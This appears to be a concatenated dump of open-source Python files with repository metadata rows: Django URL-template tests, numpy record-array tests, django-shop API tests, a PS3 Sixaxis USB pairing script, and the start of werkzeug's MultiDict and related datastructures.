with self.assertRaises(TemplateSyntaxError):
self.engine.render_to_string('url-fail16', {'named_url': 'view'})
@setup({'url-fail17': '{% url named_url a.id!id %}'})
def test_url_fail17(self):
with self.assertRaises(TemplateSyntaxError):
self.engine.render_to_string('url-fail17', {'named_url': 'view'})
@setup({'url-fail18': '{% url named_url id="unterminatedstring %}'})
def test_url_fail18(self):
with self.assertRaises(TemplateSyntaxError):
self.engine.render_to_string('url-fail18', {'named_url': 'view'})
@setup({'url-fail19': '{% url named_url id=", %}'})
def test_url_fail19(self):
with self.assertRaises(TemplateSyntaxError):
self.engine.render_to_string('url-fail19', {'named_url': 'view'})
# {% url ... as var %}
@setup({'url-asvar01': '{% url "index" as url %}'})
def test_url_asvar01(self):
output = self.engine.render_to_string('url-asvar01')
self.assertEqual(output, '')
@setup({'url-asvar02': '{% url "index" as url %}{{ url }}'})
def test_url_asvar02(self):
output = self.engine.render_to_string('url-asvar02')
self.assertEqual(output, '/')
@setup({'url-asvar03': '{% url "no_such_view" as url %}{{ url }}'})
def test_url_asvar03(self):
output = self.engine.render_to_string('url-asvar03')
self.assertEqual(output, '')
@setup({'url-namespace01': '{% url "app:named.client" 42 %}'})
def test_url_namespace01(self):
request = self.request_factory.get('/')
request.resolver_match = resolve('/ns1/')
template = self.engine.get_template('url-namespace01')
context = RequestContext(request)
output = template.render(context)
self.assertEqual(output, '/ns1/named-client/42/')
@setup({'url-namespace02': '{% url "app:named.client" 42 %}'})
def test_url_namespace02(self):
request = self.request_factory.get('/')
request.resolver_match = resolve('/ns2/')
template = self.engine.get_template('url-namespace02')
context = RequestContext(request)
output = template.render(context)
self.assertEqual(output, '/ns2/named-client/42/')
@setup({'url-namespace03': '{% url "app:named.client" 42 %}'})
def test_url_namespace03(self):
request = self.request_factory.get('/')
template = self.engine.get_template('url-namespace03')
context = RequestContext(request)
output = template.render(context)
self.assertEqual(output, '/ns2/named-client/42/')
@setup({'url-namespace-no-current-app': '{% url "app:named.client" 42 %}'})
def test_url_namespace_no_current_app(self):
request = self.request_factory.get('/')
request.resolver_match = resolve('/ns1/')
request.current_app = None
template = self.engine.get_template('url-namespace-no-current-app')
context = RequestContext(request)
output = template.render(context)
self.assertEqual(output, '/ns2/named-client/42/')
@setup({'url-namespace-explicit-current-app': '{% url "app:named.client" 42 %}'})
def test_url_namespace_explicit_current_app(self):
request = self.request_factory.get('/')
request.resolver_match = resolve('/ns1/')
request.current_app = 'app'
template = self.engine.get_template('url-namespace-explicit-current-app')
context = RequestContext(request)
output = template.render(context)
self.assertEqual(output, '/ns2/named-client/42/')
| bsd-3-clause | -5,389,943,958,253,432,000 | 42.058608 | 112 | 0.595151 | false |
argriffing/numpy | numpy/core/tests/test_records.py | 5 | 13700 | from __future__ import division, absolute_import, print_function
import sys
import collections
import pickle
from os import path
import numpy as np
from numpy.compat import asbytes
from numpy.testing import (
TestCase, run_module_suite, assert_, assert_equal, assert_array_equal,
assert_array_almost_equal, assert_raises
)
class TestFromrecords(TestCase):
def test_fromrecords(self):
r = np.rec.fromrecords([[456, 'dbe', 1.2], [2, 'de', 1.3]],
names='col1,col2,col3')
assert_equal(r[0].item(), (456, 'dbe', 1.2))
assert_equal(r['col1'].dtype.kind, 'i')
if sys.version_info[0] >= 3:
assert_equal(r['col2'].dtype.kind, 'U')
assert_equal(r['col2'].dtype.itemsize, 12)
else:
assert_equal(r['col2'].dtype.kind, 'S')
assert_equal(r['col2'].dtype.itemsize, 3)
assert_equal(r['col3'].dtype.kind, 'f')
def test_method_array(self):
r = np.rec.array(asbytes('abcdefg') * 100, formats='i2,a3,i4', shape=3, byteorder='big')
assert_equal(r[1].item(), (25444, asbytes('efg'), 1633837924))
def test_method_array2(self):
r = np.rec.array([(1, 11, 'a'), (2, 22, 'b'), (3, 33, 'c'), (4, 44, 'd'), (5, 55, 'ex'),
(6, 66, 'f'), (7, 77, 'g')], formats='u1,f4,a1')
assert_equal(r[1].item(), (2, 22.0, asbytes('b')))
def test_recarray_slices(self):
r = np.rec.array([(1, 11, 'a'), (2, 22, 'b'), (3, 33, 'c'), (4, 44, 'd'), (5, 55, 'ex'),
(6, 66, 'f'), (7, 77, 'g')], formats='u1,f4,a1')
assert_equal(r[1::2][1].item(), (4, 44.0, asbytes('d')))
def test_recarray_fromarrays(self):
x1 = np.array([1, 2, 3, 4])
x2 = np.array(['a', 'dd', 'xyz', '12'])
x3 = np.array([1.1, 2, 3, 4])
r = np.rec.fromarrays([x1, x2, x3], names='a,b,c')
assert_equal(r[1].item(), (2, 'dd', 2.0))
x1[1] = 34
assert_equal(r.a, np.array([1, 2, 3, 4]))
def test_recarray_fromfile(self):
data_dir = path.join(path.dirname(__file__), 'data')
filename = path.join(data_dir, 'recarray_from_file.fits')
fd = open(filename, 'rb')
fd.seek(2880 * 2)
r1 = np.rec.fromfile(fd, formats='f8,i4,a5', shape=3, byteorder='big')
fd.seek(2880 * 2)
r2 = np.rec.array(fd, formats='f8,i4,a5', shape=3, byteorder='big')
fd.close()
assert_equal(r1, r2)
def test_recarray_from_obj(self):
count = 10
a = np.zeros(count, dtype='O')
b = np.zeros(count, dtype='f8')
c = np.zeros(count, dtype='f8')
for i in range(len(a)):
a[i] = list(range(1, 10))
mine = np.rec.fromarrays([a, b, c], names='date,data1,data2')
for i in range(len(a)):
assert_((mine.date[i] == list(range(1, 10))))
assert_((mine.data1[i] == 0.0))
assert_((mine.data2[i] == 0.0))
def test_recarray_from_repr(self):
a = np.array([(1,'ABC'), (2, "DEF")],
dtype=[('foo', int), ('bar', 'S4')])
recordarr = np.rec.array(a)
recarr = a.view(np.recarray)
recordview = a.view(np.dtype((np.record, a.dtype)))
recordarr_r = eval("numpy." + repr(recordarr), {'numpy': np})
recarr_r = eval("numpy." + repr(recarr), {'numpy': np})
recordview_r = eval("numpy." + repr(recordview), {'numpy': np})
assert_equal(type(recordarr_r), np.recarray)
assert_equal(recordarr_r.dtype.type, np.record)
assert_equal(recordarr, recordarr_r)
assert_equal(type(recarr_r), np.recarray)
assert_equal(recarr_r.dtype.type, np.record)
assert_equal(recarr, recarr_r)
assert_equal(type(recordview_r), np.ndarray)
assert_equal(recordview.dtype.type, np.record)
assert_equal(recordview, recordview_r)
def test_recarray_views(self):
a = np.array([(1,'ABC'), (2, "DEF")],
dtype=[('foo', int), ('bar', 'S4')])
b = np.array([1,2,3,4,5], dtype=np.int64)
#check that np.rec.array gives right dtypes
assert_equal(np.rec.array(a).dtype.type, np.record)
assert_equal(type(np.rec.array(a)), np.recarray)
assert_equal(np.rec.array(b).dtype.type, np.int64)
assert_equal(type(np.rec.array(b)), np.recarray)
#check that viewing as recarray does the same
assert_equal(a.view(np.recarray).dtype.type, np.record)
assert_equal(type(a.view(np.recarray)), np.recarray)
assert_equal(b.view(np.recarray).dtype.type, np.int64)
assert_equal(type(b.view(np.recarray)), np.recarray)
#check that view to non-structured dtype preserves type=np.recarray
r = np.rec.array(np.ones(4, dtype="f4,i4"))
rv = r.view('f8').view('f4,i4')
assert_equal(type(rv), np.recarray)
assert_equal(rv.dtype.type, np.record)
#check that getitem also preserves np.recarray and np.record
r = np.rec.array(np.ones(4, dtype=[('a', 'i4'), ('b', 'i4'),
('c', 'i4,i4')]))
assert_equal(r['c'].dtype.type, np.record)
assert_equal(type(r['c']), np.recarray)
assert_equal(r[['a', 'b']].dtype.type, np.record)
assert_equal(type(r[['a', 'b']]), np.recarray)
#and that it preserves subclasses (gh-6949)
class C(np.recarray):
pass
c = r.view(C)
assert_equal(type(c['c']), C)
# check that accessing nested structures keep record type, but
# not for subarrays, non-void structures, non-structured voids
test_dtype = [('a', 'f4,f4'), ('b', 'V8'), ('c', ('f4',2)),
('d', ('i8', 'i4,i4'))]
r = np.rec.array([((1,1), b'11111111', [1,1], 1),
((1,1), b'11111111', [1,1], 1)], dtype=test_dtype)
assert_equal(r.a.dtype.type, np.record)
assert_equal(r.b.dtype.type, np.void)
assert_equal(r.c.dtype.type, np.float32)
assert_equal(r.d.dtype.type, np.int64)
# check the same, but for views
r = np.rec.array(np.ones(4, dtype='i4,i4'))
assert_equal(r.view('f4,f4').dtype.type, np.record)
assert_equal(r.view(('i4',2)).dtype.type, np.int32)
assert_equal(r.view('V8').dtype.type, np.void)
assert_equal(r.view(('i8', 'i4,i4')).dtype.type, np.int64)
#check that we can undo the view
arrs = [np.ones(4, dtype='f4,i4'), np.ones(4, dtype='f8')]
for arr in arrs:
rec = np.rec.array(arr)
# recommended way to view as an ndarray:
arr2 = rec.view(rec.dtype.fields or rec.dtype, np.ndarray)
assert_equal(arr2.dtype.type, arr.dtype.type)
assert_equal(type(arr2), type(arr))
def test_recarray_repr(self):
# make sure non-structured dtypes also show up as rec.array
a = np.array(np.ones(4, dtype='f8'))
assert_(repr(np.rec.array(a)).startswith('rec.array'))
# check that the 'np.record' part of the dtype isn't shown
a = np.rec.array(np.ones(3, dtype='i4,i4'))
assert_equal(repr(a).find('numpy.record'), -1)
a = np.rec.array(np.ones(3, dtype='i4'))
assert_(repr(a).find('dtype=int32') != -1)
def test_recarray_from_names(self):
ra = np.rec.array([
(1, 'abc', 3.7000002861022949, 0),
(2, 'xy', 6.6999998092651367, 1),
(0, ' ', 0.40000000596046448, 0)],
names='c1, c2, c3, c4')
pa = np.rec.fromrecords([
(1, 'abc', 3.7000002861022949, 0),
(2, 'xy', 6.6999998092651367, 1),
(0, ' ', 0.40000000596046448, 0)],
names='c1, c2, c3, c4')
assert_(ra.dtype == pa.dtype)
assert_(ra.shape == pa.shape)
for k in range(len(ra)):
assert_(ra[k].item() == pa[k].item())
def test_recarray_conflict_fields(self):
ra = np.rec.array([(1, 'abc', 2.3), (2, 'xyz', 4.2),
(3, 'wrs', 1.3)],
names='field, shape, mean')
ra.mean = [1.1, 2.2, 3.3]
assert_array_almost_equal(ra['mean'], [1.1, 2.2, 3.3])
assert_(type(ra.mean) is type(ra.var))
ra.shape = (1, 3)
assert_(ra.shape == (1, 3))
ra.shape = ['A', 'B', 'C']
assert_array_equal(ra['shape'], [['A', 'B', 'C']])
ra.field = 5
assert_array_equal(ra['field'], [[5, 5, 5]])
assert_(isinstance(ra.field, collections.Callable))
def test_fromrecords_with_explicit_dtype(self):
a = np.rec.fromrecords([(1, 'a'), (2, 'bbb')],
dtype=[('a', int), ('b', np.object)])
assert_equal(a.a, [1, 2])
assert_equal(a[0].a, 1)
assert_equal(a.b, ['a', 'bbb'])
assert_equal(a[-1].b, 'bbb')
#
ndtype = np.dtype([('a', int), ('b', np.object)])
a = np.rec.fromrecords([(1, 'a'), (2, 'bbb')], dtype=ndtype)
assert_equal(a.a, [1, 2])
assert_equal(a[0].a, 1)
assert_equal(a.b, ['a', 'bbb'])
assert_equal(a[-1].b, 'bbb')
def test_recarray_stringtypes(self):
# Issue #3993
a = np.array([('abc ', 1), ('abc', 2)],
dtype=[('foo', 'S4'), ('bar', int)])
a = a.view(np.recarray)
assert_equal(a.foo[0] == a.foo[1], False)
def test_recarray_returntypes(self):
qux_fields = {'C': (np.dtype('S5'), 0), 'D': (np.dtype('S5'), 6)}
a = np.rec.array([('abc ', (1,1), 1, ('abcde', 'fgehi')),
('abc', (2,3), 1, ('abcde', 'jklmn'))],
dtype=[('foo', 'S4'),
('bar', [('A', int), ('B', int)]),
('baz', int), ('qux', qux_fields)])
assert_equal(type(a.foo), np.ndarray)
assert_equal(type(a['foo']), np.ndarray)
assert_equal(type(a.bar), np.recarray)
assert_equal(type(a['bar']), np.recarray)
assert_equal(a.bar.dtype.type, np.record)
assert_equal(type(a['qux']), np.recarray)
assert_equal(a.qux.dtype.type, np.record)
assert_equal(dict(a.qux.dtype.fields), qux_fields)
assert_equal(type(a.baz), np.ndarray)
assert_equal(type(a['baz']), np.ndarray)
assert_equal(type(a[0].bar), np.record)
assert_equal(type(a[0]['bar']), np.record)
assert_equal(a[0].bar.A, 1)
assert_equal(a[0].bar['A'], 1)
assert_equal(a[0]['bar'].A, 1)
assert_equal(a[0]['bar']['A'], 1)
assert_equal(a[0].qux.D, asbytes('fgehi'))
assert_equal(a[0].qux['D'], asbytes('fgehi'))
assert_equal(a[0]['qux'].D, asbytes('fgehi'))
assert_equal(a[0]['qux']['D'], asbytes('fgehi'))
class TestRecord(TestCase):
def setUp(self):
self.data = np.rec.fromrecords([(1, 2, 3), (4, 5, 6)],
dtype=[("col1", "<i4"),
("col2", "<i4"),
("col3", "<i4")])
def test_assignment1(self):
a = self.data
assert_equal(a.col1[0], 1)
a[0].col1 = 0
assert_equal(a.col1[0], 0)
def test_assignment2(self):
a = self.data
assert_equal(a.col1[0], 1)
a.col1[0] = 0
assert_equal(a.col1[0], 0)
def test_invalid_assignment(self):
a = self.data
def assign_invalid_column(x):
x[0].col5 = 1
self.assertRaises(AttributeError, assign_invalid_column, a)
def test_out_of_order_fields(self):
"""Ticket #1431."""
x = self.data[['col1', 'col2']]
y = self.data[['col2', 'col1']]
assert_equal(x[0][0], y[0][1])
def test_pickle_1(self):
# Issue #1529
a = np.array([(1, [])], dtype=[('a', np.int32), ('b', np.int32, 0)])
assert_equal(a, pickle.loads(pickle.dumps(a)))
assert_equal(a[0], pickle.loads(pickle.dumps(a[0])))
def test_pickle_2(self):
a = self.data
assert_equal(a, pickle.loads(pickle.dumps(a)))
assert_equal(a[0], pickle.loads(pickle.dumps(a[0])))
def test_pickle_3(self):
# Issue #7140
a = self.data
pa = pickle.loads(pickle.dumps(a[0]))
assert_(pa.flags.c_contiguous)
assert_(pa.flags.f_contiguous)
assert_(pa.flags.writeable)
assert_(pa.flags.aligned)
def test_objview_record(self):
# https://github.com/numpy/numpy/issues/2599
dt = np.dtype([('foo', 'i8'), ('bar', 'O')])
r = np.zeros((1,3), dtype=dt).view(np.recarray)
r.foo = np.array([1, 2, 3]) # TypeError?
# https://github.com/numpy/numpy/issues/3256
ra = np.recarray((2,), dtype=[('x', object), ('y', float), ('z', int)])
ra[['x','y']] # TypeError?
def test_record_scalar_setitem(self):
# https://github.com/numpy/numpy/issues/3561
rec = np.recarray(1, dtype=[('x', float, 5)])
rec[0].x = 1
assert_equal(rec[0].x, np.ones(5))
def test_missing_field(self):
# https://github.com/numpy/numpy/issues/4806
arr = np.zeros((3,), dtype=[('x', int), ('y', int)])
assert_raises(ValueError, lambda: arr[['nofield']])
def test_find_duplicate():
l1 = [1, 2, 3, 4, 5, 6]
assert_(np.rec.find_duplicate(l1) == [])
l2 = [1, 2, 1, 4, 5, 6]
assert_(np.rec.find_duplicate(l2) == [1])
l3 = [1, 2, 1, 4, 1, 6, 2, 3]
assert_(np.rec.find_duplicate(l3) == [1, 2])
l3 = [2, 2, 1, 4, 1, 6, 2, 3]
assert_(np.rec.find_duplicate(l3) == [2, 1])
if __name__ == "__main__":
run_module_suite()
| bsd-3-clause | 3,310,966,152,427,312,600 | 38.595376 | 96 | 0.519416 | false |
drayanaindra/django-shop | shop/tests/api.py | 16 | 2260 | from shop.models.ordermodel import OrderExtraInfo, Order
from django.test.testcases import TestCase
from django.contrib.auth.models import User
from shop.tests.util import Mock
from shop.shop_api import ShopAPI
from decimal import Decimal
class ShopApiTestCase(TestCase):
def setUp(self):
self.user = User.objects.create(username="test",
email="[email protected]")
self.request = Mock()
setattr(self.request, 'user', None)
self.order = Order()
self.order.order_subtotal = Decimal('10.95')
self.order.order_total = Decimal('10.95')
self.order.shipping_cost = Decimal('0')
self.order.shipping_address_text = 'shipping address example'
self.order.billing_address_text = 'billing address example'
self.order.save()
def test_add_extra_info(self):
api = ShopAPI()
api.add_extra_info(self.order, 'test')
# Assert that an ExtraOrderInfo item was created
oei = OrderExtraInfo.objects.get(order=self.order)
self.assertEqual(oei.text, 'test')
def test_is_order_paid(self):
api = ShopAPI()
# Ensure deprecated method still works
res = api.is_order_payed(self.order)
self.assertEqual(res, False)
res = api.is_order_paid(self.order)
self.assertEqual(res, False)
def test_is_order_complete(self):
api = ShopAPI()
res = api.is_order_completed(self.order)
self.assertEqual(res, False)
def test_get_order_total(self):
api = ShopAPI()
res = api.get_order_total(self.order)
self.assertEqual(res, Decimal('10.95'))
def test_get_order_subtotal(self):
api = ShopAPI()
res = api.get_order_subtotal(self.order)
self.assertEqual(res, Decimal('10.95'))
def test_get_order_short_name(self):
api = ShopAPI()
res = api.get_order_short_name(self.order)
self.assertEqual(res, '1-10.95')
def test_get_order_unique_id(self):
api = ShopAPI()
res = api.get_order_unique_id(self.order)
self.assertEqual(res, 1)
def test_get_order_for_id(self):
api = ShopAPI()
res = api.get_order_for_id(1)
self.assertEqual(res, self.order)
| bsd-3-clause | 2,631,179,910,283,354,600 | 31.285714 | 69 | 0.630973 | false |
rellla/xbmca10 | tools/EventClients/lib/python/ps3/sixpair.py | 208 | 2903 | #!/usr/bin/python
# -*- coding: utf-8 -*-
import sys
import usb
vendor = 0x054c
product = 0x0268
timeout = 5000
passed_value = 0x03f5
def find_sixaxes():
res = []
for bus in usb.busses():
for dev in bus.devices:
if dev.idVendor == vendor and dev.idProduct == product:
res.append(dev)
return res
def find_interface(dev):
for cfg in dev.configurations:
for itf in cfg.interfaces:
for alt in itf:
if alt.interfaceClass == 3:
return alt
raise Exception("Unable to find interface")
def mac_to_string(mac):
return "%02x:%02x:%02x:%02x:%02x:%02x" % (mac[0], mac[1], mac[2], mac[3], mac[4], mac[5])
def set_pair_filename(dirname, filename, mac):
for bus in usb.busses():
if int(bus.dirname) == int(dirname):
for dev in bus.devices:
if int(dev.filename) == int(filename):
if dev.idVendor == vendor and dev.idProduct == product:
update_pair(dev, mac)
return
else:
raise Exception("Device is not a sixaxis")
raise Exception("Device not found")
def set_pair(dev, mac):
itf = find_interface(dev)
handle = dev.open()
msg = (0x01, 0x00) + mac;
try:
handle.detachKernelDriver(itf.interfaceNumber)
except usb.USBError:
pass
handle.claimInterface(itf.interfaceNumber)
try:
handle.controlMsg(usb.ENDPOINT_OUT | usb.TYPE_CLASS | usb.RECIP_INTERFACE
, usb.REQ_SET_CONFIGURATION, msg, passed_value, itf.interfaceNumber, timeout)
finally:
handle.releaseInterface()
def get_pair(dev):
itf = find_interface(dev)
handle = dev.open()
try:
handle.detachKernelDriver(itf.interfaceNumber)
except usb.USBError:
pass
handle.claimInterface(itf.interfaceNumber)
try:
msg = handle.controlMsg(usb.ENDPOINT_IN | usb.TYPE_CLASS | usb.RECIP_INTERFACE
, usb.REQ_CLEAR_FEATURE, 8, passed_value, itf.interfaceNumber, timeout)
finally:
handle.releaseInterface()
return msg[2:8]
def set_pair_all(mac):
devs = find_sixaxes()
for dev in devs:
update_pair(dev, mac)
def update_pair(dev, mac):
old = get_pair(dev)
if old != mac:
print "Reparing sixaxis from:" + mac_to_string(old) + " to:" + mac_to_string(mac)
set_pair(dev, mac)
if __name__=="__main__":
devs = find_sixaxes()
mac = None
if len(sys.argv) > 1:
try:
mac = sys.argv[1].split(':')
mac = tuple([int(x, 16) for x in mac])
if len(mac) != 6:
print "Invalid length of HCI address, should be 6 parts"
mac = None
except:
print "Failed to parse HCI address"
mac = None
for dev in devs:
if mac:
update_pair(dev, mac)
else:
print "Found sixaxis paired to: " + mac_to_string(get_pair(dev))
| gpl-2.0 | -6,913,882,019,155,779,000 | 24.464912 | 97 | 0.594557 | false |
stevenaubertin/showsServer | lib/werkzeug/datastructures.py | 146 | 86337 | # -*- coding: utf-8 -*-
"""
werkzeug.datastructures
~~~~~~~~~~~~~~~~~~~~~~~
This module provides mixins and classes with an immutable interface.
:copyright: (c) 2014 by the Werkzeug Team, see AUTHORS for more details.
:license: BSD, see LICENSE for more details.
"""
import re
import sys
import codecs
import mimetypes
from copy import deepcopy
from itertools import repeat
from werkzeug._internal import _missing, _empty_stream
from werkzeug._compat import iterkeys, itervalues, iteritems, iterlists, \
PY2, text_type, integer_types, string_types, make_literal_wrapper, \
to_native
_locale_delim_re = re.compile(r'[_-]')
def is_immutable(self):
raise TypeError('%r objects are immutable' % self.__class__.__name__)
def iter_multi_items(mapping):
"""Iterates over the items of a mapping yielding keys and values
without dropping any from more complex structures.
"""
if isinstance(mapping, MultiDict):
for item in iteritems(mapping, multi=True):
yield item
elif isinstance(mapping, dict):
for key, value in iteritems(mapping):
if isinstance(value, (tuple, list)):
for value in value:
yield key, value
else:
yield key, value
else:
for item in mapping:
yield item
def native_itermethods(names):
if not PY2:
return lambda x: x
def setmethod(cls, name):
itermethod = getattr(cls, name)
setattr(cls, 'iter%s' % name, itermethod)
listmethod = lambda self, *a, **kw: list(itermethod(self, *a, **kw))
listmethod.__doc__ = \
'Like :py:meth:`iter%s`, but returns a list.' % name
setattr(cls, name, listmethod)
def wrap(cls):
for name in names:
setmethod(cls, name)
return cls
return wrap
class ImmutableListMixin(object):
"""Makes a :class:`list` immutable.
.. versionadded:: 0.5
:private:
"""
_hash_cache = None
def __hash__(self):
if self._hash_cache is not None:
return self._hash_cache
rv = self._hash_cache = hash(tuple(self))
return rv
def __reduce_ex__(self, protocol):
return type(self), (list(self),)
def __delitem__(self, key):
is_immutable(self)
def __delslice__(self, i, j):
is_immutable(self)
def __iadd__(self, other):
is_immutable(self)
__imul__ = __iadd__
def __setitem__(self, key, value):
is_immutable(self)
def __setslice__(self, i, j, value):
is_immutable(self)
def append(self, item):
is_immutable(self)
remove = append
def extend(self, iterable):
is_immutable(self)
def insert(self, pos, value):
is_immutable(self)
def pop(self, index=-1):
is_immutable(self)
def reverse(self):
is_immutable(self)
def sort(self, cmp=None, key=None, reverse=None):
is_immutable(self)
class ImmutableList(ImmutableListMixin, list):
"""An immutable :class:`list`.
.. versionadded:: 0.5
:private:
"""
def __repr__(self):
return '%s(%s)' % (
self.__class__.__name__,
dict.__repr__(self),
)
class ImmutableDictMixin(object):
"""Makes a :class:`dict` immutable.
.. versionadded:: 0.5
:private:
"""
_hash_cache = None
@classmethod
def fromkeys(cls, keys, value=None):
instance = super(cls, cls).__new__(cls)
instance.__init__(zip(keys, repeat(value)))
return instance
def __reduce_ex__(self, protocol):
return type(self), (dict(self),)
def _iter_hashitems(self):
return iteritems(self)
def __hash__(self):
if self._hash_cache is not None:
return self._hash_cache
rv = self._hash_cache = hash(frozenset(self._iter_hashitems()))
return rv
def setdefault(self, key, default=None):
is_immutable(self)
def update(self, *args, **kwargs):
is_immutable(self)
def pop(self, key, default=None):
is_immutable(self)
def popitem(self):
is_immutable(self)
def __setitem__(self, key, value):
is_immutable(self)
def __delitem__(self, key):
is_immutable(self)
def clear(self):
is_immutable(self)
class ImmutableMultiDictMixin(ImmutableDictMixin):
"""Makes a :class:`MultiDict` immutable.
.. versionadded:: 0.5
:private:
"""
def __reduce_ex__(self, protocol):
return type(self), (list(iteritems(self, multi=True)),)
def _iter_hashitems(self):
return iteritems(self, multi=True)
def add(self, key, value):
is_immutable(self)
def popitemlist(self):
is_immutable(self)
def poplist(self, key):
is_immutable(self)
def setlist(self, key, new_list):
is_immutable(self)
def setlistdefault(self, key, default_list=None):
is_immutable(self)
class UpdateDictMixin(object):
"""Makes dicts call `self.on_update` on modifications.
.. versionadded:: 0.5
:private:
"""
on_update = None
def calls_update(name):
def oncall(self, *args, **kw):
rv = getattr(super(UpdateDictMixin, self), name)(*args, **kw)
if self.on_update is not None:
self.on_update(self)
return rv
oncall.__name__ = name
return oncall
def setdefault(self, key, default=None):
modified = key not in self
rv = super(UpdateDictMixin, self).setdefault(key, default)
if modified and self.on_update is not None:
self.on_update(self)
return rv
def pop(self, key, default=_missing):
modified = key in self
if default is _missing:
rv = super(UpdateDictMixin, self).pop(key)
else:
rv = super(UpdateDictMixin, self).pop(key, default)
if modified and self.on_update is not None:
self.on_update(self)
return rv
__setitem__ = calls_update('__setitem__')
__delitem__ = calls_update('__delitem__')
clear = calls_update('clear')
popitem = calls_update('popitem')
update = calls_update('update')
del calls_update
class TypeConversionDict(dict):
"""Works like a regular dict but the :meth:`get` method can perform
type conversions. :class:`MultiDict` and :class:`CombinedMultiDict`
are subclasses of this class and provide the same feature.
.. versionadded:: 0.5
"""
def get(self, key, default=None, type=None):
"""Return the default value if the requested data doesn't exist.
If `type` is provided and is a callable it should convert the value,
return it or raise a :exc:`ValueError` if that is not possible. In
this case the function will return the default as if the value was not
found:
>>> d = TypeConversionDict(foo='42', bar='blub')
>>> d.get('foo', type=int)
42
>>> d.get('bar', -1, type=int)
-1
:param key: The key to be looked up.
:param default: The default value to be returned if the key can't
be looked up. If not further specified `None` is
returned.
:param type: A callable that is used to cast the value in the
:class:`MultiDict`. If a :exc:`ValueError` is raised
by this callable the default value is returned.
"""
try:
rv = self[key]
if type is not None:
rv = type(rv)
except (KeyError, ValueError):
rv = default
return rv
class ImmutableTypeConversionDict(ImmutableDictMixin, TypeConversionDict):
"""Works like a :class:`TypeConversionDict` but does not support
modifications.
.. versionadded:: 0.5
"""
def copy(self):
"""Return a shallow mutable copy of this object. Keep in mind that
the standard library's :func:`copy` function is a no-op for this class
like for any other python immutable type (eg: :class:`tuple`).
"""
return TypeConversionDict(self)
def __copy__(self):
return self
@native_itermethods(['keys', 'values', 'items', 'lists', 'listvalues'])
class MultiDict(TypeConversionDict):
"""A :class:`MultiDict` is a dictionary subclass customized to deal with
multiple values for the same key which is for example used by the parsing
functions in the wrappers. This is necessary because some HTML form
elements pass multiple values for the same key.
:class:`MultiDict` implements all standard dictionary methods.
Internally, it saves all values for a key as a list, but the standard dict
access methods will only return the first value for a key. If you want to
gain access to the other values, too, you have to use the `list` methods as
explained below.
Basic Usage:
>>> d = MultiDict([('a', 'b'), ('a', 'c')])
>>> d
MultiDict([('a', 'b'), ('a', 'c')])
>>> d['a']
'b'
>>> d.getlist('a')
['b', 'c']
>>> 'a' in d
True
It behaves like a normal dict thus all dict functions will only return the
first value when multiple values for one key are found.
From Werkzeug 0.3 onwards, the `KeyError` raised by this class is also a
subclass of the :exc:`~exceptions.BadRequest` HTTP exception and will
render a page for a ``400 BAD REQUEST`` if caught in a catch-all for HTTP
exceptions.
A :class:`MultiDict` can be constructed from an iterable of
``(key, value)`` tuples, a dict, a :class:`MultiDict` or from Werkzeug 0.2
onwards some keyword parameters.
:param mapping: the initial value for the :class:`MultiDict`. Either a
regular dict, an iterable of ``(key, value)`` tuples
or `None`.
"""
def __init__(self, mapping=None):
if isinstance(mapping, MultiDict):
dict.__init__(self, ((k, l[:]) for k, l in iterlists(mapping)))
elif isinstance(mapping, dict):
tmp = {}
for key, value in iteritems(mapping):
if isinstance(value, (tuple, list)):
value = list(value)
else:
value = [value]
tmp[key] = value
dict.__init__(self, tmp)
else:
tmp = {}
for key, value in mapping or ():
tmp.setdefault(key, []).append(value)
dict.__init__(self, tmp)
def __getstate__(self):
return dict(self.lists())
def __setstate__(self, value):
dict.clear(self)
dict.update(self, value)
def __getitem__(self, key):
"""Return the first data value for this key;
raises KeyError if not found.
:param key: The key to be looked up.
:raise KeyError: if the key does not exist.
"""
if key in self:
return dict.__getitem__(self, key)[0]
raise exceptions.BadRequestKeyError(key)
def __setitem__(self, key, value):
"""Like :meth:`add` but removes an existing key first.
:param key: the key for the value.
:param value: the value to set.
"""
dict.__setitem__(self, key, [value])
def add(self, key, value):
"""Adds a new value for the key.
.. versionadded:: 0.6
:param key: the key for the value.
:param value: the value to add.
"""
dict.setdefault(self, key, []).append(value)
def getlist(self, key, type=None):
"""Return the list of items for a given key. If that key is not in the
`MultiDict`, the return value will be an empty list. Just as `get`
`getlist` accepts a `type` parameter. All items will be converted
with the callable defined there.
:param key: The key to be looked up.
:param type: A callable that is used to cast the value in the
:class:`MultiDict`. If a :exc:`ValueError` is raised
by this callable the value will be removed from the list.
:return: a :class:`list` of all the values for the key.
"""
try:
rv = dict.__getitem__(self, key)
except KeyError:
return []
if type is None:
return list(rv)
result = []
for item in rv:
try:
result.append(type(item))
except ValueError:
pass
return result
def setlist(self, key, new_list):
"""Remove the old values for a key and add new ones. Note that the list
you pass the values in will be shallow-copied before it is inserted in
the dictionary.
>>> d = MultiDict()
>>> d.setlist('foo', ['1', '2'])
>>> d['foo']
'1'
>>> d.getlist('foo')
['1', '2']
:param key: The key for which the values are set.
:param new_list: An iterable with the new values for the key. Old values
are removed first.
"""
dict.__setitem__(self, key, list(new_list))
def setdefault(self, key, default=None):
"""Returns the value for the key if it is in the dict, otherwise it
returns `default` and sets that value for `key`.
:param key: The key to be looked up.
:param default: The default value to be returned if the key is not
in the dict. If not further specified it's `None`.
"""
if key not in self:
self[key] = default
else:
default = self[key]
return default
def setlistdefault(self, key, default_list=None):
"""Like `setdefault` but sets multiple values. The list returned
is not a copy, but the list that is actually used internally. This
means that you can put new values into the dict by appending items
to the list:
>>> d = MultiDict({"foo": 1})
>>> d.setlistdefault("foo").extend([2, 3])
>>> d.getlist("foo")
[1, 2, 3]
:param key: The key to be looked up.
:param default: An iterable of default values. It is either copied
(in case it was a list) or converted into a list
before returned.
:return: a :class:`list`
"""
if key not in self:
default_list = list(default_list or ())
dict.__setitem__(self, key, default_list)
else:
default_list = dict.__getitem__(self, key)
return default_list
def items(self, multi=False):
"""Return an iterator of ``(key, value)`` pairs.
:param multi: If set to `True` the iterator returned will have a pair
for each value of each key. Otherwise it will only
contain pairs for the first value of each key.
"""
for key, values in iteritems(dict, self):
if multi:
for value in values:
yield key, value
else:
yield key, values[0]
def lists(self):
"""Return a list of ``(key, values)`` pairs, where values is the list
of all values associated with the key."""
for key, values in iteritems(dict, self):
yield key, list(values)
def keys(self):
return iterkeys(dict, self)
__iter__ = keys
def values(self):
"""Returns an iterator of the first value on every key's value list."""
for values in itervalues(dict, self):
yield values[0]
def listvalues(self):
"""Return an iterator of all values associated with a key. Zipping
:meth:`keys` and this is the same as calling :meth:`lists`:
>>> d = MultiDict({"foo": [1, 2, 3]})
